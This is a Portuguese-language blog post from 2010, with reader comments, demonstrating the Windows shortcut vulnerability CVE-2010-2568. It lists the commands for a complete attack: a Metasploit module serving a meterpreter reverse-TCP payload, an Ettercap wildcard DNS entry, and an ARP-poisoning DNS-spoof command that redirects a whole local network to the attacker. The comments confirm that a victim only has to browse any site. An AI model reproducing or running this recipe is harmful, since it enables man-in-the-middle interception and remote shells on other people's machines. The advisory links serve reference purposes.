Vulnerabilidade de atalho do Windows - CVE-2010-2568 - Metasploit + Ettercap

Posted: 07 setembro 2010 by Bhior in Marcadores: , , ,
4



Vulnerabilidade de atalho nos sistemas operacionais Windows das versões Windows XP SP2 e SP3, Server 2003 SP2, Vista SP1 e SP2, Server 2008 SP2 e R2, e Windows 7, que permite a execução de códigos maliciosos através dos arquivos de atalho fabiano.LNK ou fabiano.PIF que e direcionado para um DLL malicioso.
Maiores informações em:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx

O que eu fiz?
Usei o metasploit para preparar o ataque fazendo um servidor e o ettercap fazendo um MITM, e direcionando todo trafego da minha rede local para minha maquina.

Comandos:
use windows/browser/ms10_046_shortcut_icon_dllloader
set LHOST 192.168.1.4
set PAYLOAD windows/meterpreter/reverse_tcp
EditorDeTexto /usr/share/ettercap/etter.dns
*.* A SeuIP
ettercap -T -q -P dns_spoof -M ARP // //

Sobre o Vídeo:
Formato: AVI
Tamanho: 12.6 MB
Duração: 4:45 min
Autor: Fabiano Matias aka Bhior
Musica:  Cachimbo da paz - Gabriel o Pensador
Baixar: http://www.4shared.com/file/MzP5k2eD/Windows_LNK_CVE-2010-2568.html

Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568
http://www.osvdb.org/66387
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx
http://adrenaline.com.br/seguranca/noticias/5616/criminosos-exploram-icones-de-atalhos-para-espalhar-malware.html

4 comentários:

  1. tela says:

    Muito bom bhior ,

    umas pergunta ..

    como fazer esses atalhos que vc diz ( fabiano.LNK ou fabiano.PIF )

    no aguardo...

    by user777

  1. tela says:

    Ha bhior acho qe entendi ja

    quando rodo o ettercap e rodo o exploit ...

    temos que esperar ate que alguem da rede acesse qualquer site ai abre os 2 arquivos n maquina teste é iss mesmo??

    outra coisa bhior teria como ensinar cmo personalizar a tela de entrada do msf..

    by user777

  1. Bhior says:

    @tela,

    Sim,

    Para sua segunda pergunta, vou fazer a aula.

    Abraços

  1. tela says:

    Valeu bhior no aguardo...

    By user777